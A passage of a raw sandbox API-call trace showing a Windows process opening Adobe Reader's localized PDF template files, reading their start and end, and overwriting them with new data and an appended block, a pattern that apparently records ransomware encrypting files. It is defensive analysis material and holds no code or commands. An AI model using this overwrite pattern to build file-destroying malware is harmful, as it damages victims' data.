lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0xf6ec [0061.095] WriteFile (in: hFile=0x1c4, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0061.096] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0061.096] WriteFile (in: hFile=0x1c4, lpBuffer=0x2666a38*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2666a38*, lpNumberOfBytesWritten=0x2b1f28c*=0x4000, lpOverlapped=0x0) returned 1 [0061.096] CloseHandle (hObject=0x1c4) returned 1 [0061.098] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\FRA\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\fra\\adobeid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0061.738] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0061.738] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x10ab0 [0061.738] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0061.739] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0061.739] ReleaseMutex (hMutex=0x168) returned 1 [0061.739] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeID.pdf", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0061.739] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeID.pdf", cchWideChar=11, lpMultiByteStr=0x1f7324c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdobeID.pdf", lpUsedDefaultChar=0x0) returned 11 [0061.739] ReadFile (in: hFile=0x1d4, lpBuffer=0x2662a08, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesRead=0x2b1f278*=0x4000, lpOverlapped=0x0) returned 1 [0061.741] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0xfab0 [0061.741] ReadFile (in: hFile=0x1d4, lpBuffer=0x26b3238, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x26b3238*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0061.741] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0xfab0 [0061.742] WriteFile (in: hFile=0x1d4, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0061.742] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0061.743] WriteFile (in: hFile=0x1d4, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2b1f28c*=0x4000, lpOverlapped=0x0) returned 1 [0061.743] CloseHandle (hObject=0x1d4) returned 1 [0061.744] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\JPN\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\jpn\\adobeid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0061.745] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0061.745] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x5944 [0061.745] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0061.745] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0061.745] ReleaseMutex (hMutex=0x168) returned 1 [0061.745] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeID.pdf", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0061.745] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeID.pdf", cchWideChar=11, lpMultiByteStr=0x1f732cc, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdobeID.pdf", lpUsedDefaultChar=0x0) returned 11 [0061.745] ReadFile (in: hFile=0x1d4, lpBuffer=0x26b3238, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x26b3238*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0061.747] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x4944 [0061.747] ReadFile (in: hFile=0x1d4, lpBuffer=0x2664a38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2664a38*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0061.748] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x4944 [0061.748] WriteFile (in: hFile=0x1d4, lpBuffer=0x2662a08*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0061.748] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0061.748] WriteFile (in: hFile=0x1d4, lpBuffer=0x2662a08*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0061.748] CloseHandle (hObject=0x1d4) returned 1 [0061.749] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\POL\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\pol\\adobeid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0061.750] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0061.750] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x26ca2 [0061.750] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0061.750] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0061.750] ReleaseMutex (hMutex=0x168) returned 1 [0061.750] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeID.pdf", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0061.750] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeID.pdf", cchWideChar=11, lpMultiByteStr=0x1f7324c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdobeID.pdf", lpUsedDefaultChar=0x0) returned 11 [0061.750] ReadFile (in: hFile=0x1d4, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2b1f278*=0x8000, lpOverlapped=0x0) returned 1 [0061.752] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x25ca2 [0061.752] ReadFile (in: hFile=0x1d4, lpBuffer=0x26b3238, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x26b3238*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0061.753] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x25ca2 [0061.753] WriteFile (in: hFile=0x1d4, lpBuffer=0x26b3238*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x26b3238*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0061.754] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0061.754] WriteFile (in: hFile=0x1d4, lpBuffer=0x2691bb8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesWritten=0x2b1f28c*=0x8000, lpOverlapped=0x0) returned 1 [0061.754] CloseHandle (hObject=0x1d4) returned 1 [0061.758] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SKY\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\sky\\adobeid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0061.758] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0061.758] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x161fc [0061.759] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0061.759] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0061.759] ReleaseMutex (hMutex=0x168) returned 1 [0061.759] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeID.pdf", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0061.759] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeID.pdf", cchWideChar=11, lpMultiByteStr=0x1f732cc, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdobeID.pdf", lpUsedDefaultChar=0x0) returned 11 [0061.759] ReadFile (in: hFile=0x1d4, lpBuffer=0x2662a08, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesRead=0x2b1f278*=0x4000, lpOverlapped=0x0) returned 1 [0061.760] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x151fc [0061.760] ReadFile (in: hFile=0x1d4, lpBuffer=0x26b3238, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x26b3238*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0061.761] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x151fc [0061.761] WriteFile (in: hFile=0x1d4, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0061.762] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0061.762] WriteFile (in: hFile=0x1d4, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2b1f28c*=0x4000, lpOverlapped=0x0) returned 1 [0061.762] CloseHandle (hObject=0x1d4) returned 1 [0061.763] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\TUR\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\tur\\adobeid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0061.764] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0061.764] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x49db0 [0061.764] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0061.764] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0061.764] ReleaseMutex (hMutex=0x168) returned 1 [0061.764] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeID.pdf", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0061.764] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeID.pdf", cchWideChar=11, lpMultiByteStr=0x1f7324c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdobeID.pdf", lpUsedDefaultChar=0x0) returned 11 [0061.764] ReadFile (in: hFile=0x1d4, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2b1f278*=0x8000, lpOverlapped=0x0) returned 1 [0061.766] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x48db0 [0061.766] ReadFile (in: hFile=0x1d4, lpBuffer=0x26b3238, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x26b3238*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0061.768] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x48db0 [0061.769] WriteFile (in: hFile=0x1d4, lpBuffer=0x26b3238*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x26b3238*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0061.769] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0061.769] WriteFile (in: hFile=0x1d4, lpBuffer=0x2691bb8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesWritten=0x2b1f28c*=0x8000, lpOverlapped=0x0) returned 1 [0061.769] CloseHandle (hObject=0x1d4) returned 1 [0061.774] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CAT\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\cat\\signhere.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0061.776] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0061.776] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x8c96 [0061.776] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0061.776] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0061.776] ReleaseMutex (hMutex=0x168) returned 1 [0061.776] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SignHere.pdf", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0061.776] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SignHere.pdf", cchWideChar=12, lpMultiByteStr=0x1f7358c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SignHere.pdf", lpUsedDefaultChar=0x0) returned 12 [0061.776] ReadFile (in: hFile=0x1d4, lpBuffer=0x2662a08, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesRead=0x2b1f278*=0x4000, lpOverlapped=0x0) returned 1 [0062.106] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x7c96 [0062.106] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0062.106] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x7c96 [0062.107] WriteFile (in: hFile=0x1d4, lpBuffer=0x26b4468*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x26b4468*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0062.108] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0062.108] WriteFile (in: hFile=0x1d4, lpBuffer=0x2666a38*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2666a38*, lpNumberOfBytesWritten=0x2b1f28c*=0x4000, lpOverlapped=0x0) returned 1 [0062.108] CloseHandle (hObject=0x1d4) returned 1 [0062.111] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHT\\Hanko.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\cht\\hanko.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0062.111] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0062.112] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xb7c2 [0062.112] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0062.112] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0062.112] ReleaseMutex (hMutex=0x168) returned 1 [0062.112] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Hanko.pdf", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0062.112] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Hanko.pdf", cchWideChar=9, lpMultiByteStr=0x1f7352c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Hanko.pdf", lpUsedDefaultChar=0x0) returned 9 [0062.112] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ec1538, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ec1538*, lpNumberOfBytesRead=0x2b1f278*=0x4000, lpOverlapped=0x0) returned 1 [0062.115] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0xa7c2 [0062.115] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0062.115] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0xa7c2 [0062.115] WriteFile (in: hFile=0x1d4, lpBuffer=0x26b4468*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x26b4468*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0062.115] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0062.115] WriteFile (in: hFile=0x1d4, lpBuffer=0x1ec1538*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ec1538*, lpNumberOfBytesWritten=0x2b1f28c*=0x4000, lpOverlapped=0x0) returned 1 [0062.116] CloseHandle (hObject=0x1d4) returned 1 [0062.117] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CZE\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\cze\\standardbusiness.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0062.119] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0062.119] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x15c7a [0062.119] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0062.119] 